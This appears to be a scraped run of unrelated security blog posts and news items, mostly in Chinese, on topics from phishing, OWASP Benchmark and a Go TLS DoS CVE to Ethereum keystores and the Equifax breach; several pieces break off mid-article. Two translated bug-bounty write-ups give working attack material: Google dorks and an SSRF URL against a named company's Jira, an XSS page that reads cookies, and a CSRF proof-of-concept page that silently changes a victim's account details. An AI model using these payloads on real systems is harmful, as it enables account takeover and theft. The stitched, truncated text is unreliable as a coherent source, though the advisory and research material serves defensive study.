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在报告中,对于网络钓鱼的手段、目标,以及应对方式,进行了总结。 惯用诱饵作为安全意识培训的重点 ――当下成功率最高的诱饵是利用人们的贪婪,关注,紧迫和恐惧等情绪,促使他们打开电子邮件并点击固定内容。 盗用身份是主要手法 ――从2018年9月1日到10月31日,71%的虚假钓鱼案例均是伪装成10家顶级科技行业公司,从而获得受害者的信任并实现欺诈。 金融机构是节日钓鱼季诈骗中的重点攻击对象 ――但同时,F5预计未来针对电子商务和物流行业的诈骗比重将会持续上升。 加强安全意识培训, 对于保护企业和个人免受网络钓鱼而言至关重要――通过培训员工辨别网络钓鱼骗局,企业能有效地将恶意电子邮件,链接和附件的点击率从33%降低到13%。 控制出现在员工邮箱的钓鱼电子邮件,是防御途径之一 ――当然,即便设置Web过滤,防病毒软件和设置多重身份验证控制后,员工仍有机会成为网络钓鱼攻击受害者。


1. 目标选择:即寻找合适的受害者,特别要透过电子邮件地址和背景信息,总结出一个具有吸引力的心理痛点。

2. 社交机制:布置恰当的诈骗诱饵,诱使受害者掉入陷阱,以窃取他们的账户并植入恶意软件。在鱼叉式网络的钓鱼案例中,这种诱饵是针对目标受害者而定制的。每当年终岁尾,网络钓鱼者会利用年终和节假日的各类活动包装出伪装外衣。

3. 技术工程:钓鱼者躲避开安全程序的扫描,以构建虚假网站,制作恶意软件等技术性方法开展诈骗。




1. 减少URLS应用:尽量减少在如bit.ly这类服务网址上的浏览时间,因为他们都可以是恶性的。用户应该打开新的浏览器选项卡,并搜索涉及到的有关内容或网站。

2. 重视安全证书警告:警告会显示在用户浏览器,以提示当前登录网站的安全证书无效,或尚未由受信任的机构颁发证书。如果用户认为该网站合法,不该忽略警告,应另在单独的浏览器窗口中搜索该网站。

3. 认真检查网址:伪造的网络钓鱼网站往往精心制作,伪装出充分的合法性。因此,在提供登录认证或帐户等任何个人信息之前,用户应养成认真检查地址栏中网址的习惯。

















12月17日,捷克网络监管部门――国家网络与信息安全办公室主任杜桑纳夫拉蒂尔(Dusan Navratil)在一份声明中声称,“中国的法律要求中国的民营企业与情报部门配合,因此把他们的产品引入到关键的国家系统中,可能构成威胁。” 为此,总理安德烈巴比什呼吁国家安全委员会向国家网络与信息安全办公室主任杜桑纳瓦里蒂尔了解发布警告声明和补充公布信息的情况。

OWASP Benchmark的搭建和使用


OWASP benchmark是OWASP组织下的一个开源项目,又叫作OWASP基准测试项目,它是免费且开放的测试套件。它可以用来评估那些自动化安全扫描工具的速度、覆盖范围和准确性,这样就可以得到这些软件的优点和缺点,还可以对它们进行相互比较。每个版本的OWASP benchmark都包含数千个完全可运行和利用的测试用例,每个测试用例都映射到该漏洞的相应CWE编号,所以该项目的漏洞数量和漏洞类型都是固定的,因此就可以查看扫描工具的测试报告进行对比得出该工具的误报和漏报率。



1)工具正确识别了真实漏洞(True Positive-TP);

2)工具没有识别真实漏洞(False Negative-FN);

3)工具没有误报(Ture Negative-TN);

4)工具误报(False Positive-FP)


OWASP Benchmark的搭建和使用

此图上可以直观地显示工具检测报告的真实存在的漏洞和误报的表现,我们还可以计算出一个点的得分(0-100),将其称为Benchmark Accuracy Score(基准准确度得分),是一种Youden Index。基准准确度得分的计算方法为:

(sensitivity + specificity) 1 Sensitivity = TPR=TP/(TP+FN)
Specificity = 1-FPR=TN/(TN+FP)
Youden Index=(sensitivity + specificity) 1
=TPR-FPR 三、benchmark v1.2 漏洞整理


漏洞种类 数量 CWE编号 Command Injection 251 78 Weak Cryptography 246 327 Weak Hashing 236 328 LDAP Injection 59 90 Path Traversal 268 22 Secure Cookie Flag 67 614 SQL Injection 504 89 Trust Boundary Violation 126 501 Weak Randomness 493 330 XPATH Injection 35 643 XSS (Cross-Site Scripting) 455 79 Total Test Cases 2740 四、benchmark搭建(windows) 1)在运行benchmark之前首先确保电脑中已经搭建好git、maven(v3.2.3 or 更高)、java(7 or 8)。 2)下载并编译运行benchmark:

$ git clone https://github.com/OWASP/benchmark $ cd benchmark$ mvn compile (This compiles it)$ runBenchmark.sh/.bat This compiles and runs it.

然后用浏览器打开 https://localhost:8443/benchmark/,就可访问benchmark。




cd benchmark .\scripts\runPMD.bat


cd benchmark .\scripts\runFindBugs.bat


cd benchmark .\scripts\runSecFindBugs.bat


Benchmark_1.2-findbugs-v3.0.1-1026.xml 六、生成记分卡




Golang TLS双向身份认证DoS漏洞分析(CVE-2018-16875)


Golang TLS双向身份认证DoS漏洞分析(CVE-2018-16875)

如果程序源代码使用Go语言编写,并且用到了单向或者双向TLS认证,那么就容易受到CPU拒绝服务(DoS)攻击。Go语言的 crypto/x509 标准库中的校验算法存在逻辑缺陷,攻击者可以精心构造输入数据,使校验算法在尝试验证客户端提供的TLS证书链时占用所有可用的CPU资源。

为了保护正常服务,大家应立即 升级 到G0 v1.10.6、v1.11.3或者更新版本。


42Crunch的API Security平台后端采用的是微服务架构,而微服务使用Go语言编写。微服务之间通过 gRPC 相互通信,并且部署了REST API网关用于外部调用。为了确保安全性,我们遵循了“TLS everywhere”(处处部署TLS)原则,广泛采用了TLS双向认证机制。



42Crunch 安全团队针细致分析了该CVE,如下文所示。



crypto/x509 包负责解析并验证X.509编码的密钥和证书,正常情况下会占用一定的资源来处理攻击者提供的证书链。

crypto/x509 包并没有限制验证每个证书链时所分配的工作量,攻击者有可能构造恶意输入,导致CPU拒绝服务。Go TLS服务器在接受客户端证书或者TLS客户端在验证证书时会受此漏洞影响。

该漏洞具体位于 crypto/x509 Certificate.Verify() 函数的调用路径中,该函数负责证书认证及验证。

四、漏洞分析 背景知识


TLS服务器在 8080 端口监听TLS客户端请求,验证客户端证书是否由证书颁发机构(CA)颁发:

caPool := x509.NewCertPool()
ok := caPool.AppendCertsFromPEM(caCert)
if !ok {
panic(errors.New("could not add to CA pool"))
tlsConfig := &tls.Config{
ClientCAs: caPool,
ClientAuth: tls.RequireAndVerifyClientCert,
server := &http.Server{
Addr: ":8080",
TLSConfig: tlsConfig,
server.ListenAndServeTLS(certWeb, keyWeb)

在标准的TLS验证场景中,TLS客户端会连接到TLS服务器的 8080 端口,然后向服务器提供证书的“trust chain”(信任链),其中包括客户端证书、root CA证书以及中间所有CA证书。TLS服务器处理TLS握手,验证客户端证书,检查客户端是否可信(即客户端证书是否由服务器信任的CA签名)。通常TLS握手过程如下图所示:

Golang TLS双向身份认证DoS漏洞分析(CVE-2018-16875)

分析Go语言的 crypto/x509 库,最终我们会进入 x509/tls/handshake_server.go:doFullHandshake() 函数代码段:

if c.config.ClientAuth >= RequestClientCert {
if certMsg, ok = msg.(*certificateMsg); !ok {
return unexpectedMessageError(certMsg, msg)
if len(certMsg.certificates) == 0 {
// The client didn't actually send a certificate
switch c.config.ClientAuth {
case RequireAnyClientCert, RequireAndVerifyClientCert:
return errors.New("tls: client didn't provide a certificate")
pub, err = hs.processCertsFromClient(certMsg.certificates)
if err != nil {
return err
msg, err = c.readHandshake()
if err != nil {
return err

根据代码,服务器会处理收到的客户端证书,然后调用 x509/tls/handshake_server.go:processCertsFromClient() 函数。如果需要验证客户端证书,服务器就会创建一个 VerifyOptions 结构,其中包含如下信息:

root CA池,即已配置的一系列可信CA(由服务器控制),用来验证客户端证书 中间CA池,即服务端收到的一系列中间CA(由客户端控制) 已签名的客户端证书(由客户端控制) 其他字段(可选项) if c.config.ClientAuth >= VerifyClientCertIfGiven && len(certs) > 0 {
opts := x509.VerifyOptions{
Roots: c.config.ClientCAs,
CurrentTime: c.config.time(),
Intermediates: x509.NewCertPool(),
KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
for _, cert := range certs[1:] {
chains, err := certs[0].Verify(opts)
if err != nil {
return nil, errors.New("tls: failed to verify client's certificate: " + err.Error())
c.verifiedChains = chains

为了澄清问题机理,我们需要理解服务端如何管理证书池,以便通过高效的方式来验证证书。证书池实际上就是一个证书列表,可以根据实际需求通过3种不同的方式来访问。一种访问方式如下图所示:池中证书可以通过索引数组(这里为 Certs )来访问,以 CN , IssuerName , SubjectKeyId 字段作为哈希字段。

Golang TLS双向身份认证DoS漏洞分析(CVE-2018-16875)
验证过程 服务端使用 VerifyOptions 参数调用 Verify() 函数来处理客户端证书(即 chain:certs[0] 中的第一个证书)。

然后 Verify() 会根据客户端提供的证书链来处理待验证的客户端证书,但首先需要使用 buildChains() 函数建立并检查整条验证链:

var candidateChains [][]*Certificate
if opts.Roots.contains(c) {
candidateChains = append(candidateChains, []*Certificate{c})
} else {
if candidateChains, err = c.buildChains(make(map[int][][]*Certificate), []*Certificate{c}, &opts); err != nil {
return nil, err

而 buildChains() 函数会依次调用占用CPU资源的一些函数,递归处理这条链上的每个元素。

buildChains() 函数依赖于 findVerifiedParents() 函数,而后者可以通过 IssuerName 或者 AuthorityKeyId 映射访问证书池,识别上级证书,,然后返回候选证书索引,以便后续根据客户端控制的证书池来验证该证书。

在正常情况下,程序会提取 IssuerName 及 AuthorityKeyId ,并且认为这些值为唯一值,只会返回一个待验证的证书:

func (s *CertPool) findVerifiedParents(cert *Certificate) (parents []int, errCert *Certificate, err error) {
if s == nil {
var candidates []int
if len(cert.AuthorityKeyId) > 0 {
candidates = s.bySubjectKeyId[string(cert.AuthorityKeyId)]
if len(candidates) == 0 {
candidates = s.byName[string(cert.RawIssuer)]
for _, c := range candidates {
if err = cert.CheckSignatureFrom(s.certs[c]); err == nil {
parents = append(parents, c)
} else {
errCert = s.certs[c]

buildChains() 函数会在客户端发给TLS服务器的整条证书链上执行如下操作:

在(服务端)root CA池上调用 findVerifiedParents(client_certificate) ,查找待验证证书的签发机构(判断是否为root CA),然后根据 AuthorityKeyId (如果不为 nil )或者原始的issuer值(如果为 nil )检查所有找到的证书的签名 在(客户端提供的)中间CA池上调用 findVerifiedParents(client_certificate) ,查找已验证证书的签发机构(判断是否为中间CA),然后根据 AuthorityKeyId (如果不为 nil )或者原始的 issuer 值(如果为 nil )检查所有找到的证书的签名 获取上一级中间签名节点 在新发现的中间节点上调用 buildChains() ,然后重复前面描述的签名检查过程
Golang TLS双向身份认证DoS漏洞分析(CVE-2018-16875)

攻击者可以构造一种非预期场景,其中所有的中间CA证书使用的都是同一个名称,并且 AuthKeyId 值为 nil ,这样当调用 buildChains() 和 findVerifiedParent() 函数时,就会造成CPU DoS攻击效果。 findVerifiedParent() 函数会返回与该名称匹配的所有证书(这里返回的是整个证书池),然后检查所有证书的签名。检查完毕后,会再次递归调用 buildchains() 函数处理找到的上一级证书,最后处理到root CA为止。每一次检查过程实际上都会处理整个中间CA池,因此单单一个TLS连接就会耗尽所有可用的CPU资源。

Golang TLS双向身份认证DoS漏洞分析(CVE-2018-16875)



Go语言社区已经通过 如下措施 修复该问题:


如果向修复该漏洞,请立即 升级 到G0 v1.10.6、v1.11.3或者更新版本。

第五篇翻译:SSRF to XSS

我正在测试一个名为visma的公共BUG赏金计划,像往常一样,我先收集了它的一些子域名。很少有子域能引起我的关注,但是下面列出的运行jira服务的子域成功吸引了我的注意 1. https://jira.visma.lv/secure/Dashboard.jspa 2. https://customer-incident.consulting.visma.com/secure/Dashboard.jspa 如果你想找一些运行jira服务的子域练练手,可以试试使用下面的谷歌语法 inurl:visma intitle:JIRA login inurl:companyname intitle:JIRA login
第五篇翻译:SSRF to XSS
我注意到域名 https://customer-incident.consulting.visma.com 具有JIRA 6.3.1版本。我记得CVE-2017-9506 影响范围是Jira versions < 7.3.5,所以我尝试验证一下该网站是否具有SSRF漏洞 https://customer-incident.consulting.visma.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
第五篇翻译:SSRF to XSS
我尝试获取一些网站内部数据或获取读取权限,但是我失败了。 如果你想用脚本自动测试网站是否存在jira漏洞,我建议你使用Github上的exp工具 Jira-Scan 另外,我还创建了一个简单的HTML页面,上面包含了XSS漏洞。我将重定向页面指定到我的XSS漏洞页面,这样我们就能够触发XSS,并且获取到 https://customer-incident.consulting.visma.com 网站的用户cookie,而不是百度的cookie [*]攻击者创建的evil.html <html> <head> <title>SSRF to XSS on Jira Vulnerable Instances</title> </head> <body> <script> alert( document.domain + " is vulnerable" ); alert( document.cookie); </script> </body> </html>
第五篇翻译:SSRF to XSS




如何导入Geth创建的账号? 在 上一篇文章


有一些同学会问,我的账号是Geth生成的,如何导入到钱包呢?使用Geth的同学,应该知道Geth在创建账号时会生成一个对应keystore JSON文件,Keystore文件存储加密后的私钥信息,因此我们需要做的就是导入这个Keystore文件,这个文件通常在同步区块数据的目录下的keystore文件夹(如: ~/.ethereum/keystore)里。

尽管在ethers.js 中,简单的使用一个函数就可以完成keystore文件的导入,不过理解Keystore 文件的作用及原理还是非常有必要的,当然如果你是在没有兴趣,可以直接跳到本文最后一节:使用ethers.js 实现账号导出导入。

详细解读 Keystore 文件 为什么需要 Keystore 文件

通过这篇文章理解开发HD 钱包涉及的 BIP32、BIP44、BIP39,私钥其实就代表了一个账号,最简单的保管账号的方式就是直接把私钥保存起来,如果私钥文件被人盗取,我们的数字资产将洗劫一空。

Keystore 文件就是一种以加密的方式存储密钥的文件,这样的发起交易的时候,先从Keystore 文件是使用密码解密出私钥,然后进行签名交易。这样做之后就会安全的多,因为只有黑客同时盗取 keystore 文件和密码才能盗取我们的数字资产。

Keystore 文件如何生成的

以太坊是使用对称加密算法来加密私钥生成Keystore文件,因此对称加密秘钥(注意它其实也是发起交易时需要的解密秘钥)的选择就非常关键,这个秘钥是使用KDF算法推导派生而出。因此在完整介绍Keystore 文件如何生成前,有必要先介绍一下KDF。

使用 KDF 生成秘钥

密码学KDF(key derivation functions),其作用是通过一个密码派生出一个或多个秘钥,即从 password 生成加密用的 key。

其实在理解开发HD 钱包涉及的 BIP32、BIP44、BIP39中介绍助记词推导出种子的PBKDF2算法就是一种KDF函数,其原理是加盐以及增加哈希迭代次数。


DK = Scrypt(salt, dk_len, n, r, p)

其中的 salt 是一段随机的盐,dk_len 是输出的哈希值的长度。n 是 CPU/Memory 开销值,越高的开销值,计算就越困难。r 表示块大小,p 表示并行度。

Litecoin 就使用 scrypt 作为它的 POW 算法



上面已经用KDF算法生成了一个秘钥,这个秘钥就是接着进行对称加密的秘钥,这里使用的对称加密算法是 aes-128-ctr,aes-128-ctr 加密算法还需要用到一个参数初始化向量 iv。


好了,我们现在结合具体 Keystore文件的内容,就很容易理解了Keystore 文件怎么产生的了。



address: 账号地址 version: Keystore文件的版本,目前为第3版,也称为V3 KeyStore。 id : uuid crypto: 加密推倒的相关配置. cipher 是用于加密以太坊私钥的对称加密算法。用的是 aes-128-ctr 。 cipherparams 是 aes-128-ctr 加密算法需要的参数。在这里,用到的唯一的参数 iv。 ciphertext 是加密算法输出的密文,也是将来解密时的需要的输入。 kdf: 指定使用哪一个算法,这里使用的是 scrypt。 kdfparams: scrypt函数需要的参数 mac: 用来校验密码的正确性, mac= sha3(DK[16:32], ciphertext) 下面一个小节单独分析。

我们来完整梳理一下 Keystore 文件的产生:

使用scrypt函数 (根据密码 和 相应的参数) 生成秘钥 使用上一步生成的秘钥 + 账号私钥 + 参数 进行对称加密。 把相关的参数 和 输出的密文 保存为以上格式的 JSON 文件 如何确保密码是对的?




这就是 keystore 文件中 mac 值的作用。mac 值是 kdf输出 和 ciphertext 密文进行SHA3-256运算的结果,显然密码不同,计算的mac 值也不同,因此可以用来检验密码的正确性。检验过程用图表示如下:



用ethers.js 实现账号导出导入

ethers.js 直接提供了加载keystore JSON来创建钱包对象以及加密生成keystore文件的方法,方法如下:

// 导入keystore Json ethers.Wallet.fromEncryptedJson(json, password, [progressCallback]).then(function(wallet) { // wallet }); // 使用钱包对象 导出keystore Json
wallet.encrypt(pwd, [progressCallback].then(function(json) {
// 保存json



HTML 代码如下:

<h3>KeyStore 导出:</h3> <table> <tr> <th>密码:</th> <td><input type="text" placeholder="(password)" id="save-keystore-file-pwd" /></td> </tr> <tr>
<td> </td>
<div id="save-keystore" class="submit">导出</div>


// "导出" 按钮,执行exportKeystore函数 $('#save-keystore').click(exportKeystore); exportKeystore: function() {
// 获取密码
var pwd = $('#save-keystore-file-pwd'); // wallet 是上一篇文章中生成的钱包对象
wallet.encrypt(pwd.val()).then(function(json) {
var blob = new Blob([json], {type: "text/plain;charset=utf-8"}); // 使用了FileSaver.js 进行文件保存
saveAs(blob, "keystore.json"); });
} FileSaver.js


再来看看导入keystore 文件, UI图如下:

<td><div class="file" id="select-wallet-drop">把Json文件拖动到这里</div><input type="file" id="select-wallet-file" /></td>
<td><input type="password" placeholder="(password)" id="select-wallet-password" /></td>
<td> </td>
<div id="select-submit-wallet" class="submit disable">解密</div>


// 使用FileReader读取文件, var fileReader = new FileReader();
fileReader.onload = function(e) {
var json = e.target.result; // 从加载
ethers.Wallet.fromEncryptedJson(json, password).then(function(wallet) { }, function(error) { }); };



深入浅出区块链- 系统学习区块链,打造最好的区块链技术博客。


接下来我将分享最近在私有BUG赏金平台上发现的API接口漏洞,这些漏洞真的特别有意思! 首先咱们假设漏洞站点的域名是redact.io ,该站点使用API从服务器上获取用户的数据,例如: http://api.redact.io 在开始渗透之前,我通常会先去了解该站点的API的工作原理,我在 http://docs.redact.io 上面阅读了完整的相关文档。了解你的目标网站的工作方式是非常重要的,知己知彼百战不殆,当你收集到足够多的信息之后,就能很轻松的制定攻击步骤!
我发现目标域redact.io 正在使用 https://api.redact.io/service/ < userID> 来获取用户数据,这里的userID是该站点用户的唯一用户ID 所以我尝试去修改这里的userID,看看在未授权的情况下能否从这里提取数据,但是网站只是返回一个404错误给我 https://api.redact.io/service/05c0dc81753821cbdf9ab1cd5e366d21










今天介绍一种文明方法,既不用以毒攻毒的360,也不需要依赖windows defender。

1.按住Windows+R,输入cmd(命令提示符) 2.输入 X:(其中X为你的U盘名) 3.进入你的U盘后,输入指令:attrib /s 4.此时会显示出你的所有文件及状态,他们只是被隐藏了起来 5.输入attrib -s -h -r X:\Y (其中X为你的U盘名,Y为你要恢复的文件夹名称) 6.enter即可恢复文件夹


Federal Council not deciding again Switzerland falling behind on Cybersecurit ...


To be clear upfront: I think that our political system is amongst the best across the Globe. It is one of the purest systems to reflect a democratic process in a direct democracy. This is shown in special initiatives like the “Hornkuh Initiative”, where on farmer from the Swiss mountains found enough support for his idea to bring it in front of the Swiss citizens and the politics had to discuss it (it was about supporting farms who still work with cows with horns).

The downside however is speed: Our political processes are sound but slow, sometimes very slow and you can see that when it comes to Cybersecurity especially in the conflict between the shiny initiatives like e-voting and the hard work around security.

Our government tries to enable the digitalization and to provide a framework and an environment where companies can grow and they do a not too bad job there.

But then on the political pane they are driving initiatives like e-voting, which to me is mainly a political PR initiative with almost no real value-add but high risks. We are voting about very six weeks and it is a fundamental part of our society. Additionally, we can use different channels today already like early voting, voting by postal service or in person on the day of the vote. I highly doubt that it will increase the number of people going to vote nor do I think that the quality of the vote will increase if you can “swipe left or right” to vote yes or no. Voting requires upfront thinking and an upfront debate on the subject. I do not see a lot of upsides on e-voting except for a few politicians who can claim that they are the ones driving.

The “only” value add is for Swiss citizens living abroad (which is important, and I can understand this) but the risks connected to bring one of our most fundamental processes in our society to the internet are simply not acceptable. This was shown in a discovery by the Chaos Computer Club: Flaw reported in Switzerland’s biggest e-voting system . Not really a surprise. And this caused me to write this blog: On the one hand, our government and mainly our Federal Council wants to show their drive towards digital Switzerland with high-risk initiatives like e-voting but they miss the fundamental work on Cybersecurity: Schweiz: Regierung gibt grünes Licht für E-Voting die Gegner sind zahlreich . They key point which some people make is that we did a certain number of votes online already in some states in Switzerland and “nothing happened”. A laughable point if you are a security pro.

This is the shiny side, lets look at the basics, let’s have a look at security…

Since quite a time, the Swiss Federal Government is driving a National Cybersecurity Strategy and the people behind this strategy are very good and motivated but the responsible people on the political level do not take their accountability to drive this process. Instead the ministries are fighting each other on competencies and budgets. In July, the Federal Council took a no-decision on Mr./Mrs. Cyber, which caused an uproar within the security community. Different organizations published open letters, something which is not too common in Switzerland. It drove some press coverage as well:

SATW: Offener Brief Grundsatzentscheide des Bundesrates zur Cybersecurity: Die Richtung stimmt, doch das Vorgehen ist zu zgerlich und die Massnahmen sind ungenügend Der Bundesrat will einen Mister Cyber-Security aber nur mit beschrnkter Macht Cybersicherheit: Top-Experten kritisieren den Bundesrat … and a lot more

The Federal Council did not take a position on this coverage (which is perfectly ok) but we all at least expect some action.

Well, the worst happened and the Federal Council once again did take a non-decision just before Christmas: Rückschlag für Cybersicherheit beim Bund Bundesrat vertagt Entscheid über Kompetenzzentrum

Dear Federal Council, I know that you will not read that but if you do, please consider:
There are a lot of high-skilled experts in commissions to support the government and the industry with their experience. To be clear, we all do that in our spare time. It might make sense if you at least consider their opinion and listen to them . Else, we all rather spend our time with our families and go skiing than spending our time in meeting rooms if you know better anyway. The bad guys are moving fast . You are talking about years (to have the budget, the headcount and then think about how you will find the right people). The bad guys are talking about hours and days. The speed you show and the unwillingness to decide is shocking and simply unacceptable sorry to be so harsh. You are putting Switzerland at risk. As simple as that. Instead of investing your energy into an initiative where you feel that you get press coverage and can shine like e-voting,

rather do your job and fix the basics and spend what is needed on security. This is the core job of the government and of you as a civil servant.

If we will ever have a Mr./Mrs. Cyber I hope, we find somebody with the right profile who is actually willing to do the job with the history we have here listen to her/him! Do not do what you do to the experts in the field. Do not ignore this person!

It would be nice if we get a smart and forward-looking decision beginning of next year! And then move fast!!

The Top 4 Tips to Accepting Online Payments


Today many people are using online payments more than ever before. The reason for this is that many businesses have integrated an online payment system as one of the way of receiving payments. The other reason as to why online payments have increased significantly is because is because it has been made safe and convenient that most people are able to use it without fearing that their information will be compromised. The other reason as to why online payment has increased in popularity is because it is easy and in most cases instantaneously. These are some of the tips you need to have at hand when looking to find the best way to accept payments online .

1. Online Credit and Debit cards

The basic way that businesses are using to receive online payment is by allowing their customers to use their credit and debit cards online. The commonly used cards which are used are Master Card, American Express, and Visa. This is where businesses are adding the feature where customers can input their credit card details which can then be verified and automatically billed when they make their purchases. This is a gateway which is added directly on a business website where customers are able to create their payment profile and returning customers do not have to keep keying in their financial information as it is stored on the website securely.

2. Accepting eChecks

Another way that business are accepting online payments is by accepting eChecks which most of them are paid directly through the customer’s bank. The banking systems today are generating eChecks which do not require the filling of a physical paper. The good thing about eCheck is that what is mostly required is the filling of information in an online form which is processed electronically and also sends electronically.

You may like: 7 Reasons Why Your Ecommerce Website isn’t Selling Enough

3. Through Merchant account

There are businesses which prefer to accept online payment through merchant account which are dedicated for their business. This is another, very effective method given that it’s much easier and the merchant account takes care of all the security and maintenance issues. The common types of merchant account which most businesses are already using include: Authorize.Net and SecureNet which have proven to be safe and highly secure. The merchant service will act as a link between your customer and your business. This increases the transaction security and efficiency but one thing to note is that there are usually charges of this but in most cases, the charges are not high.

4. Mobile payment

The increase of smartphone with internet access has allowed for more businesses to integrate this mode of payments. This is another very effective way of accepting online payments because now customers are able to key in the details of their credit number on their mobile platform. There has also been a rise in the mobile money payment system. This is where you can use your smartphone to make payments over the internet and also receive instant confirmation once the payment has been made.





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第七篇翻译:bypass CSRF

嗨,伙计们!与你们分享一些好的东西总是很愉快的。从文章的标题就可以猜到今天我将分享一些关于绕过CSRF防护的技术。 什么是CSRF保护? 简而言之,CSRF(跨站请求伪造)攻击是一种专门针对WEB站点状态更改请求的攻击。为了防止这种攻击,开发人员以多种方式在request请求中添加了ANTI-CSRF token令牌。如果你想了解详细的原理可以看看这两篇文章 “ Article-1 “,” Article-2 “ 现在我们假设站点域名为vulnhost.com,该站点根据一个POST请求提供的数据验证我们的请求。vulnhost.com实际上是先将_csrf token标记到POST请求中,然后再在服务器端验证_csrf token [*]状态更改请求看起来像是下面这样的 POST /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact HTTP/1.1 Host: en.vulnhost.com User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://en.vulnhost.com/mycenter/settings/account.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Wicket-Ajax: true Migration-Wicket: 6 Wicket-Ajax-BaseURL: mycenter/settings/account.html Wicket-FocusedElementId: id49 X-Requested-With: XMLHttpRequest Content-Length: 246 Cookie: ....... Connection: close . _csrf=725a7f90-192f-4b94-8fc9-6320ace14fef&id48_hf_0=&gender=radio8&firstName=xx&lastName=YY&saveContact=1 这里,_csrf=…. 用来生成随机令牌,并提交给服务端进行验证。如果我利用GET方法发送请求,并将_csrf令牌删除,那么服务端将不会对其进行验证 GET /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=XX&lastName=YY&saveContact=1 HTTP/1.1 Host: en.vulnhost.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://en.vulnhost.com/mycenter/settings/account.html Wicket-Ajax: true Migration-Wicket: 6 Wicket-Ajax-BaseURL: mycenter/settings/account.html Wicket-FocusedElementId: id49 X-Requested-With: XMLHttpRequest Cookie: ... Connection: close 正如期待的那样,服务端响应200 OK,但是使用典型的HTML POC来更改请求时会出现一些问题。以前我也遇到过,之所以会这样,是因为在这种情况下浏览器需要刷新之后才能渲染请求到的内容。我猜想GET请求包含了一堆HTTP header,这可能会中断更改请求 为了解决这个问题,我结合了javascript和HTML来构造POC

<html> <head> <script type="text/javascript"> var timer = null; function auto_reload() { window.location = 'https://en.vulnhost.com/mycenter/settings/account.html?4-2.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=Account&lastName=Takeover&saveContact=1'; } </script> <body> <!-- Reload page every 5 seconds. --> <body onload="timer = setTimeout('auto_reload()',5000);"> </body> </html>

'Serious' Twitter flaw allows hackers to post on other people's accounts


A British security researcher has discovered a serious flaw in Twitter that allows anyone with knowledge of the vulnerability to send tweets from other users’ accounts.

Richard De Vere, from ethical hacking firm The Antisocial Engineer , told Computer Weekly he worked out how to exploit the flaw in a matter of minutes.

“This is not a complicated hack, it’s a logic flaw in code.” he said.

The flaw exposes any account that has a mobile phone number associated with it. With knowledge of that number an attacker is able to post tweets, retweet, send direct messages, or post images and videos. According to De Vere, hackers can even switch off Twitter’s two-factor authentication functionality, which means that knowledge of a user’s login and password details would enable complete control over the account.

De Vere demonstrated the flaw to Computer Weekly. We shared a mobile phone number that was associated with the @computerweekly Twitter account . Within minutes, and with our written permission, De Vere posted a tweet on the account ( see picture, below ), which said: "Thank you for allowing us to demonstrate the attack," above an image that added, "Thank you @computerweekly for allowing us to post this on your account as a PoC [proof of concept]." We subsequently deleted the tweet.
'Serious' Twitter flaw allows hackers to post on other people's accounts

De Vere has reported details of the flaw to HackerOne, the security testing firm that runs Twitter’sbug bounty programme for notifying vulnerabilities. He said he isn’t seeking payment but it was the only way to report the issue.

He explained to Computer Weekly in a high-level summary how the hack was possible, but asked us not to disclose this information for fear of alerting malicious actors wishing to exploit the flaw. However, De Vere said he believes some hackers may already be aware of the bug, and have used it as part of scams on Twitter where high-profile accounts appear to have tweeted promotions for fake cryptocurrency schemes.

Ed Tucker , CEO at security consultancy Byte, and a former head of IT security at HM Revenue & Customs, described the flaw as a “serious vulnerability” .

“Imagine if, say, you used 10,000 phone numbers with this vulnerability, and then wrote a tweet about something, maybe a bitcoin scam, or maybe some fake news. Then every one of those phone numbers that was associated with a Twitter account would tweet the same message,” he said.

“Imagine what you could do with that, or what has been done with that previously. You would only notice some odd behaviour on your own account maybe, and not the thousands all doing the same.”

Tucker praised The Antisocial Engineer for exposing the problem, pointing out there is no way of providing details of the bug to Twitter without going through the HackerOne reporting process.

De Vere said he expected Twitter to struggle with the problem as it could mean switching off worldwide an important part of its functionality related to the bug. But he was also confident Twitter would fix the flaw.

“Do you know how frustrating it is to actually find the solution on their own website - but it’s not enforced as standard? It’s the classic case of policy being better than real-world implementation. IT security teams are obsessed with sophisticated attacks when often social engineering just works,” he said.

Hackers have previously taken thousands of dollars in cryptocurrency scams by posing as entrepreneur Elon Musk and hijacking high-profile Twitter accounts to impersonate Musk promoting fake crypto or Bitcoin schemes.




这篇文章的内容主要翻译自2018年12月美国政府报告《The Equifax Data Breach》,对报告内容进行了精简和整理,旨在详细了解这起安全事件的始末,以一个比较全面的视角去审视安全工作。如果你觉得公司还不够重视安全,你可以把这当成一个安全案例用于培训;如果你对公司的安全水平很有自信,也可以拿它来对标review一下自己的安全工作是否到位。当然,企业面临的安全威胁多种多样,黑客外部入侵、内鬼泄露、针对员工的钓鱼攻击等等,这个事件并不能覆盖所有的攻击向量,但仍能从中发现和总结有用的内容。

2017年9月, 美国最大的征信机构之一Equifax对外宣布了一起影响1.48亿用户的网络安全事件。这是美国历史上最大的一起数据泄露事件之一,影响几乎一半的美国人口,政府将其总结为“这完全是一起可以避免的事故,但是Equifax并没有做好安全措施来保护用户的敏感数据”。










一、Equifax的商业模式 1.商业模式

在美国有三大征信机构(The consumer reporting agency,简称CRA)分别是Equifax、Experian、TransUnion,征信机构收集消费者的信息,对其进行分析以创建信用评分和详细报告,然后将报告出售给第三方,并以此盈利。企业使用CRA提供的用户信用数据来识别和管理交融交易风险,例如,金融机构在决定是否授予贷款和调整相应的利率时参考信用报告和信用分;保险公司使用这些信息来设置保单的保费;而企业雇主则可以使用这些信息来甄别雇员的欺诈风险;电信服务提供商则利用这些报告核实客户的身份,并确定新客户的付款要求和话费额度。



图: Equifax如何接收你的数据





